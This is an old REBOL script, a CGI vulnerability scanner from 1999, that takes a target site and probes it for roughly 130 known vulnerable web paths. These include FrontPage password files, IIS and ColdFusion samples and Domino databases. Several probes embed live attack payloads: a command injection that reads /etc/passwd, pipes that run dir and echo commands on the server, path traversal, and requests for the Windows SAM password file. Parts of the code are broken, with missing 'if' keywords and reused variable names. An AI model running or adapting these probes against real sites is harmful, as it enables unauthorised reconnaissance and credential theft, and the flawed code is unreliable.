REBOL [   Title:   "CGI Check 99 v0.4"   
Date:    18-nov-1999   Author:  "deepquest"
Comment: "extra shOut 2: Ken, attrition, H4k, acpo, bhz, vetegirl, nataS, acp0, krisTof, mad55,  nucleus."   
Comment: " homebased: www.deepquest.pf"
Comment: "what's new?: cgi vulnerabilitie from 1996 to 18-2-99"
Comment: "2do : class A, B, C scan-- add more remote cgi stuff!!"

File:    %cgi-check99v4.r   
Email:   deepquest@netscape.net   
Purpose: {      most cross platform CGI scanner ported to REBOL.   }]
secure none
print "CGI Scanner.  by deepquest http://www.deepquest.pf."

prin "Site to scan: "
site: input
a: exists? join http:// [ site "/cgi-bin/rwwwshell.pl " ]
if a == yes [	print "THC - Backdoor"	]
b: exists? join http:// [ site "/cgi-bin/phf " ]
if b == yes [	print "PHF"	]
c: exists? join http:// [ site "/cgi-bin/Count.cgi " ]
if c == yes [	print "Count.cgi"	]
d: exists? join http:// [ site "/cgi-bin/test.cgi " ]
if d == yes [	print "test-cgi"	]
e: exists? join http:// [ site "/cgi-bin/nph-test-cgi " ]
if e == yes [	print "nhp-test-cgi "	]
f: exists? join http:// [ site "/cgi-bin/nph-publish " ]
if f == yes [	print "nph-publish"	]
g: exists? join http:// [ site "/cgi-bin/php.cgi " ]
if g == yes [	print "PHP"	]
h: exists? join http:// [ site "/cgi-bin/handler " ]
if h == yes [	print "handler"	]
i: exists? join http:// [ site "/cgi-bin/webgais " ]if 
i == yes [	print "webgais"	]
j: exists? join http:// [ site "/cgi-bin/websendmail " ]
if j == yes [	print "websendmail"	]
k: exists? join http:// [ site "/cgi-bin/webdist.cgi " ]
if k == yes [	print "webdist.cgi"	]
l: exists? join http:// [ site "/cgi-bin/faxsurvey " ]
if l == yes [	print "faxsurvey"	]
m: exists? join http:// [ site "/cgi-bin/htmlscript " ]
if m == yes [	print "htmlscript"	]
n: exists? join http:// [ site "/cgi-bin/pfdisplay.cgi" ]
if n == yes [	print "pfdisplay"	]
o: exists? join http:// [ site "/cgi-bin/perl.exe" ]
if o == yes [	print "perl.exe"	]
p: exists? join http:// [ site "/cgi-bin/wwwboard.pl" ]
if p == yes [	print "wwwboard.pl"	]
q: exists? join http:// [ site "/cgi-bin/www-sql " ]
if q == yes [	print "www-sql"	]
r: exists? join http:// [ site "/cgi-bin/view-source " ]
if r == yes [	print "view-source"	]
s: exists? join http:// [ site "/cgi-bin/campas " ]
if s == yes [	print "campas"	]
t: exists? join http:// [ site "/cgi-bin/aglimpse " ]
if t == yes [	print "aglimpse"	]
u: exists? join http:// [ site "/cgi-bin/glimpse " ]
if u == yes [	print "glimpse"	]
v: exists? join http:// [ site "/cgi-bin/man.sh " ]
if v == yes [	print "man.sh"	]
w: exists? join http:// [ site "/cgi-bin/AT-admin.cgi " ]
if w == yes [	print "AT-admin.cgi"	]
x: exists? join http:// [ site "/cgi-bin/filemail.pl " ]
if x == yes [	print "filemail.pl"	]
y: exists? join http:// [ site "/cgi-bin/maillist.pl " ]
if y == yes [	print "maillist.pl"	]
z: exists? join http:// [ site "/cgi-bin/jj " ]
if z == yes [	print "jj"	]
aa: exists? join http:// [ site "/cgi-bin/info2www " ]
if aa == yes [	print "info2www"	]
bb: exists? join http:// [ site "/cgi-bin/files.pl " ]if 
bb == yes [	print "files.pl"	]
cc: exists? join http:// [ site "/cgi-bin/finger " ]
if cc == yes [	print "finger"	]
dd: exists? join http:// [ site "/cgi-bin/bnbform.cgi " ]
if dd == yes [	print "bnbform.cgi"	]
ee: exists? join http:// [ site "/cgi-bin/survey.cgi " ]
if ee == yes [	print "survey.cgi"	]
ff: exists? join http:// [ site "/cgi-bin/AnyForm2 " ]
if ff == yes [	print "AnyForm2"	]
gg: exists? join http:// [ site "/cgi-bin/textcounter.pl " ]
if gg == yes [	print "textcounter.pl"	]
hh: exists? join http:// [ site "/cgi-bin/classifieds.cgi " ]
if hh == yes [	print "classifieds.cgi"	]
ii: exists? join http:// [ site "/cgi-bin/environ.cgi " ]
if ii == yes [	print "environ.cgi"	]
jj: exists? join http:// [ site "/cgi-bin/wrap " ]
if jj == yes [	print "wrap"	]
kk: exists? join http:// [ site "/cgi-bin/cgiwrap " ]
if kk == yes [	print "cgiwrap"	]
ll: exists? join http:// [ site "/cgi-bin/guestbook.cgi " ]
if ll == yes [	print "guestbook.cgi"	]
mm: exists? join http:// [ site "/cgi-bin/edit.pl " ]
if mm == yes [	print "edit.pl"	]
nn: exists? join http:// [ site "/cgi-bin/perlshop.cgi " ]
if nn == yes [	print "perlshop.cgi"	]
oo: exists? join http:// [ site "/_vti_inf.html " ]
if oo == yes [	print "_vti_inf.html"	]
pp: exists? join http:// [ site "/_vti_pvt/service.pwd " ]
if pp == yes [	print "service.pwd"	]
qq: exists? join http:// [ site "/_vti_pvt/users.pwd " ]
if qq == yes [	print "users.pwd"	]
rr: exists? join http:// [ site "/_vti_pvt/authors.pwd" ]
if rr == yes [	print "authors.pwd"	]
ss: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ]
if ss == yes [	print "administrators.pwd"	]
tt: exists? join http:// [ site "/_vti_pvt/shtml.dll " ]
if tt == yes [	print "shtml.dll"	]
uu: exists? join http:// [ site "/_vti_pvt/shtml.exe " ]
if uu == yes [	print "shtml.exe"	]
vv: exists? join http:// [ site "/cgi-dos/args.bat " ]
if vv == yes [	print "args.bat"	]
ww: exists? join http:// [ site "/cgi-win/uploader.exe " ]
if ww == yes [	print "uploader.exe"	]
xx: exists? join http:// [ site "/cgi-bin/rguest.exe " ]if 
xx == yes [	print "rguest.exe"	]
yy: exists? join http:// [ site "/cgi-bin/wguest.exe " ]
if yy == yes [	print "wguest.exe"	]
zz: exists? join http:// [ site "/scripts/issadmin/bdir.htr " ]
if zz == yes [	print "BDir - Samples"	]
aaa: exists? join http:// [ site "/scripts/CGImail.exe " ]
if aaa == yes [	print "CGImail.exe"	]
bbb: exists? join http:// [ site "/scripts/tools/newdsn.exe " ]
if bbb == yes [	print "IIS MDAC RDS vulnerability bugtraq ID: 529 "	]
ccc: exists? join http:// [ site "/scripts/fpcount.exe " ]
if ccc == yes [	print "fpcount.exe"	]
ddd: exists? join http:// [ site "/cfdocs/expelval/openfile.cfm " ]
if ddd == yes [	print "openfile.cfm"	]
eee: exists? join http:// [ site "/cfdocs/expelval/exprcalc.cfm " ]
if eee == yes [	print "exprcalc.cfm"	]
fff: exists? join http:// [ site "/cfdocs/expelval/displayopenedfile.cfm " ]
if fff == yes [	print "displayopenedfile.cfm"	]
ggg: exists? join http:// [ site "/cfdocs/expelval/sendmail.cfm " ]
if ggg == yes [	print "sendmail.cfm"	]
hhh: exists? join http:// [ site "/iissamples/exair/howitworks/codebrws.asp " ]
if hhh == yes [	print "codebrws.asp"	]
iii: exists? join http:// [ site "/iissamples/sdk/asp/docs/codebrws.asp " ]
if iii == yes [	print "codebrws.asp"	]
jjj: exists? join http:// [ site "/msads/Samples/SELECTOR/showcode.asp " ]
if jjj == yes [	print "showcode.asp"	]
kkk: exists? join http:// [ site "/search97.vts " ]if 
kkk == yes [	print "search97.vts"	]
lll: exists? join http:// [ site "/carbo.dll " ]
if lll == yes [	print "carbo.dll"	]
mmm: exists? join http:// [ site "/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd " ]if 
mmm == yes [	print "whois_raw.cgi"	]
nnn: exists? join http:// [ site "/doc " ]if 
nnn == yes [	print "Debian Boa"	]
ooo: exists? join http:// [ site "/.html/............./config.sys " ]if 
ooo == yes [	print "ICQ99"	]
ppp: exists? join http:// [ site "/....../ " ]if 
ppp == yes [	print "personal webserver"	]
rrr: exists? join http:// [ site "/scripts/no-such-file.pl " ]if 
rrr == yes [	print "IIS-perl"	] 
sss: exists? join http:// [ site "/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr= " ]if 
sss == yes [	print "ODBC default config "	]
ttt: exists? join http:// [ site "/_vti_bin/shtml.dll" ]
ttt == yes [	print "frontpage authentication dll "	]
uuu: exists? join http:// [ site "/_vti_inf.html " ]
uuu == yes [	print "basic configuration of front page " ]
vvv: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ]
vvv == yes [	print "admin password file " ]
www: exists? join http:// [ site "/_vti_pvt/users.pwd " ]
www == yes [	print "users password file " ]
xxx: exists? join http:// [ site "/msadc/Samples/SELECTOR/showcode.asp " ]
xxx == yes [	print "Showcode ASP bugtrad ID:167 " ]
zzz: exists? join http:// [ site "/scripts/iisadmin/ism.dll?http/dir " ]
zzz == yes [	print "IIS remote web administration butraq ID:189 " ]
aa1: exists? join http:// [ site "/adsamples/config/site.csc " ]
aa1 == yes [	print "adsamples vulnerability bugtrad ID:256 " ]
aa2: exists? join http:// [ site "/main.asp%81 " ]
aa2  == yes [	print "IIS double byte code page vulnerability bugtraq ID:477 " ]
aa3: exists? join http:// [ site "/AdvWorks/equipment/catalog_type.asp? " ]
aa3 == yes [	print "jet engine VBA vulnerability bugtraq ID:286 " ]
aa4: exists? join http:// [ site "/cgi-win/uploader.exe " ]
aa4 == yes [	print " what do u want to upload today?uploader.exe found... " ]
aa5: exists? join http:// [ site "/../../config.sys " ]
aa5 == yes [	print "falcon webserver .. stuff bugtraq ID: 743 " ]
aa6: exists? join http:// [ site "/iisadmpwd/achg.htr " ]
aa6 == yes [	print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
aa7: exists? join http:// [ site "/iisadmpwd/aexp.htr " ]
aa7 == yes [	print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
aa8: exists? join http:// [ site "/iisadmpwd/aexp2.htr " ]
aa8 == yes [	print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
aa9: exists? join http:// [ site "/iisadmpwd/aexp4b.htr " ]
aa9 == yes [	print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
a10: exists? join http:// [ site "/iisadmpwd/aexp4b.htr " ]
a10 == yes [	print "malformed HTR file vulnerability X-force ID:ISS-026 " ]
a11: exists? join http:// [ site "cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._ " ]
a11 == yes [	print "coldFusion remote file display bugtrad ID: 115 " ]
a12: exists? join http:// [ site "/cfdocs/expeval/openfile.cfm " ]
a12 == yes [	print "coldFusion remote upload bugtrad ID: 115 " ]
a13: exists? join http:// [ site "/cfdocs/expeval/openfile.cfm " ]
a13 == yes [	print "coldFusion remote upload bugtrad ID: 115 " ]
a14: exists? join http:// [ site "/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._ " ]
a14 == yes [	print "coldFusion forum access bugtrad ID: 229 " ]
a15: exists? join http:// [ site "/CFIDE/Administrator/startstop.html " ]
a15 == yes [	print "coldFusion star/stop sevrvice bugtrad ID: 274 " ]
a16: exists? join http:// [ site "/cgi-bin/wwwboard.pl " ]
a16 == yes [	print "web board admin login " ]
a17: exists? join http:// [ site "/cgi-bin/input.bat?|dir..\..\windows " ]
a17 == yes [	print "AN-HTTPd CGI bug bugtraq ID: 762 " ]
a18: exists? join http:// [ site "/index.asp::$DATA " ]
a18 == yes [	print "IIS asp alternate data bugtraq ID:149 " ]
a19: exists? join http:// [ site "/cgi-bin/visadmin.exe?user=guest " ]
a19 == yes [	print "OmniHTTPd Web issue make hd full of temp files " ]
a20: exists? join http:// [ site "/?PageServices " ]
a20 == yes [	print "Netscape Enterprise remote directory browser "]
a21: exists? join http:// [ site "/ss.cfg " ]
a21 == yes [	print "mediahouse statistics server password bugtraq ID: 735 " ]
a22: exists? join http:// [ site "/cgi-bin/get32.exe|echo%20>c:\file.txt " ]
a22 == yes [	print "Alibaba cgi issue bugtraq ID: 770 " ]
a23: exists? join http:// [ site "/cgi-bin/cachemgr.cgi " ]
a23 == yes [	print "squid cache mngr bugtraq ID:149 " ]
a24: exists? join http:// [ site "/cgi-bin/pfdispaly.cgi?/../../../../etc/motd "]
a24 == yes [	print "IRIS performer API search tool  " ]
a25: exists? join http:// [ site "/domcfg.nsf " ]
a25 == yes [	print "lotus domino write database and server configuration " ]
a26: exists? join http:// [ site "/today.nsf" ]
a26 == yes [	print "lotus domino write database and server configuration " ]
a27: exists? join http:// [ site "/names.nsf " ]
a27 == yes [	print "lotus domino write database and server configuration " ]
a28: exists? join http:// [ site "/catalog.nsf " ]
a28 == yes [	print "lotus domino write database and server configuration " ]
a29: exists? join http:// [ site "/log.nsf " ]
a29 == yes [	print "lotus domino write database and server configuration " ]
a30: exists? join http:// [ site "/domlog.nsf " ]
a30 == yes [	print "lotus domino write database and server configuration " ]
a31: exists? join http:// [ site "/cgi-bin/AT-generate.cgi " ]
a31 == yes [	print "security bugs in excite for Web Servers 1.1 " ]
a32: exists? join http:// [ site "/secure/.wwwacl " ]
a32 == yes [	print "Access Control List in CERN server " ]
a33: exists? join http:// [ site "/secure/.htaccess " ]
a33 == yes [	print "Access Control List in NCSA-derived servers " ]
a34: exists? join http:// [ site "/samples/search/webhits.exe " ]
a34 == yes [	print "MS indexer server issue searching #filename=*.asp " ]
a35: exists? join http:// [ site "/scripts/srchadm/admin.idq " ]
a35 == yes [	print "MS indexer server issue displaying remote tree " ]
a36: exists? join http:// [ site "/cgi-bin/dumpenv.pl " ]
a36 == yes [	print " Sambar remote server info tree-users and more..." ]
a37: exists? join http:// [ site "adminlogin?RCpage=/sysadmin/index.stm " ]
a37 == yes [	print " Sambar remote login on default configuration " ]
a38: exists? join http:// [ site "/c:/program " ]
a38 == yes [	print " Sambar remote browsing on c: " ]
a39: exists? join http:// [ site "/getdrvrs.exe " ]
a39 == yes [	print "NT ODBC remote issue " ]
a30: exists? join http:// [ site "/test/test.cgi " ]
a30 == yes [	print "Cobalt RaQ2 cgiwrap issue bugtraq ID:777 " ]
a31: exists? join http:// [ site "/scripts/submit.cgi " ]
a31 == yes [	print "Cobalt RaQ2 cgiwrap issue bugtraq ID:777 " ]
a32: exists? join http:// [ site "/users/scripts/submit.cgi " ]
a32 == yes [	print "Cobalt RaQ2 cgiwrap issue bugtraq ID:777 " ]
a33: exists? join http:// [ site "/ncl_items.html?SUBJECT=2097 " ]
a33 == yes [	print " Tektronix PhaserLink webserver administrator password bugtraq ID:806 " ]